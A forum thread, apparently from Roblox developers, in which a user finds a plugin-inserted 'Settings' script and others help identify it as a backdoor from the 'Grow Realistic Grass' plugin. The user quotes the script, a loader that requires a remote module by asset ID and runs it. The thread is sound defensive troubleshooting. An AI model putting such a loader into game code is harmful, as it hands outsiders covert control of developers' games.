Do i have a virus in my studio?

I dont know if its a pluggins or what thats doing this, but once in a while a random script appears in one of my objects in explorer called “Settings” and alll the script reads is this

local loaderFolder = script.Parent local tempFold = game.ServerStorage local SettingsModule = 6500274752 require(SettingsModule):Fire()

i dont know if this is a pluggin just tryna do its thing or if i somehow got a virus in my studio. I havent used the toolbox for anything other than Sound and Images so i dont know what the cause is.

Will this be a problem?

It definitely looks like some sort of backdoor, I would recommend removing it if you have no recollection of adding it.

If you only added sounds and images, then it could be a plugin, check them one by one to see which one makes it appear, and then remove that plugin

Yeah, it’s a virus

I mean… they obfuscated it. They are trying to hide something

Okay ill try,

Ive only got one active which is “Realistic grass” so I’ve just switched off “Script injection”

ill come back to this thread if the problem persists

its quite a bad virus cause the scripts always the same name so i just delete it everytime it appears.

thats why i thought it could be a pluggin tryna do its thing.

I had one plugin that inserted a script and I thought it was roblox doing it but nope

Do you have any free models in your game?

So that requires this module:

Seems suspicious.

Make sure you only use plugins made by trusted people. If you use ones by people that are not trusted, then it could lead to a big problem. Also, do research on plugins before you install them, because that will help prevent things like this from happening.

I am 99.99999% sure

the only way I can think I’ve used it during this place is one time the roblox animation dummy spawn thing wouldn’t spawn in R15 mesh rigs so I needed to use something else for animating on. I deleted it ages ago though, and i dont even think i did the animations in the Main Place i think i opened a separate studio to do it.

Wait is the scripts getting inserted while you are in game, do they stay that after you stop the game?

I think its everytime i open studio, ill test for it now

I will say that’s a plugin that is causing that cause if its staying there then you have a plugin that inserts a virus

Try uninstalling all of your plugins. Reinstall them one by one and restart your studio and try to find the script. Once you see that script it is that plugin you reinstalled.

Hehe i have found Le culprit…

“20:14:21.186 Plugin “Grow Realistic Grass” was denied script injection permission. You can grant this permission in the Plugin Manager. - Edit”

When disabled it doesn’t create the settings script

Weird though cause im sure i downloaded this plugin off the front page, i didnt even need reaslistic grass i just thought it looked cool

Thanks for help though all
